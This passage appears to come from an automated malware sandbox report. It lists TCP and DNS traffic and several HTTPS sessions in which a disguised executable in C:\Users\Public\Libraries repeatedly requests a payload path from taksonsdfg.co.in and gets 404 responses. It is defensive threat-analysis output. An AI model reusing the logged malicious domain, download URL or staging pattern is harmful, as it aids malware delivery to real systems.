                                                                                    Oct 14, 2024 04:31:18.169667959 CEST50214443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:18.169684887 CEST44350214108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:18.170397997 CEST44350214108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:18.173683882 CEST50214443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:18.215403080 CEST44350214108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:18.420928001 CEST44350214108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:18.421112061 CEST44350214108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:18.421156883 CEST50214443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:18.425968885 CEST50214443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:18.425996065 CEST44350214108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:18.426008940 CEST50214443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:18.426016092 CEST44350214108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:18.634320021 CEST50215443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:18.634423018 CEST44350215108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:18.634613037 CEST50215443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:18.642406940 CEST50215443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:18.642522097 CEST44350215108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:18.642790079 CEST50215443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:18.655136108 CEST50216443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:18.655208111 CEST44350216108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:18.655312061 CEST50216443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:18.655641079 CEST50216443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:18.655658960 CEST44350216108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:19.255503893 CEST44350216108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:19.255681038 CEST50216443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:19.256958008 CEST50216443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:19.256989002 CEST44350216108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:19.257790089 CEST44350216108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:19.259084940 CEST50216443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:19.299413919 CEST44350216108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:19.509145021 CEST44350216108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:19.509527922 CEST44350216108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:19.509637117 CEST50216443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:19.509768009 CEST50216443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:19.509768009 CEST50216443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:19.509821892 CEST44350216108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:19.509850025 CEST44350216108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:19.705271006 CEST50217443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:19.705315113 CEST44350217108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:19.705404043 CEST50217443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:19.705504894 CEST50217443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:19.705629110 CEST44350217108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:19.705883980 CEST50217443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:19.716202974 CEST50218443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:19.716214895 CEST44350218108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:19.716279030 CEST50218443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:19.716540098 CEST50218443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:19.716553926 CEST44350218108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:20.328783989 CEST44350218108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:20.328866959 CEST50218443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:20.330528975 CEST50218443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:20.330544949 CEST44350218108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:20.330780029 CEST44350218108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:20.331850052 CEST50218443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:20.379405975 CEST44350218108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:20.588820934 CEST44350218108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:20.588995934 CEST44350218108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:20.589224100 CEST50218443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:20.589562893 CEST50218443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:20.589587927 CEST44350218108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:20.589621067 CEST50218443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:20.589627981 CEST44350218108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:20.795614958 CEST50219443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:20.795660973 CEST44350219108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:20.795730114 CEST50219443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:20.795887947 CEST50219443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:20.795934916 CEST44350219108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:20.796045065 CEST50219443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:20.814584017 CEST50220443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:20.814642906 CEST44350220108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:20.814790964 CEST50220443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:20.815037012 CEST50220443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:20.815073967 CEST44350220108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:21.405493021 CEST44350220108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:21.405574083 CEST50220443192.168.2.4108.170.55.202

                                                                                    UDP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Oct 14, 2024 04:29:18.207295895 CEST4929753192.168.2.41.1.1.1
                                                                                    Oct 14, 2024 04:29:18.518568039 CEST53492971.1.1.1192.168.2.4

                                                                                    DNS Queries

                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Oct 14, 2024 04:29:18.207295895 CEST192.168.2.41.1.1.10x3f6Standard query (0)taksonsdfg.co.inA (IP address)IN (0x0001)false

                                                                                    DNS Answers

                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Oct 14, 2024 04:29:18.518568039 CEST1.1.1.1192.168.2.40x3f6No error (0)taksonsdfg.co.in108.170.55.202A (IP address)IN (0x0001)false

                                                                                    HTTP Request Dependency Graph

                                                                                    • taksonsdfg.co.in

                                                                                    HTTPS Proxied Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.449731108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:29:19 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:29:19 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:29:19 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:29:19 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:29:19 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.2.449733108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:29:20 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:29:20 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:29:20 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:29:20 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:29:20 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2192.168.2.449735108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:29:21 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:29:21 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:29:21 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:29:21 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:29:21 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3192.168.2.449737108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:29:22 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:29:22 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:29:22 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:29:22 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:29:22 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4192.168.2.449739108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:29:23 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:29:23 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:29:23 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:29:23 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:29:23 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5192.168.2.449741108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:29:24 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:29:25 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:29:25 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
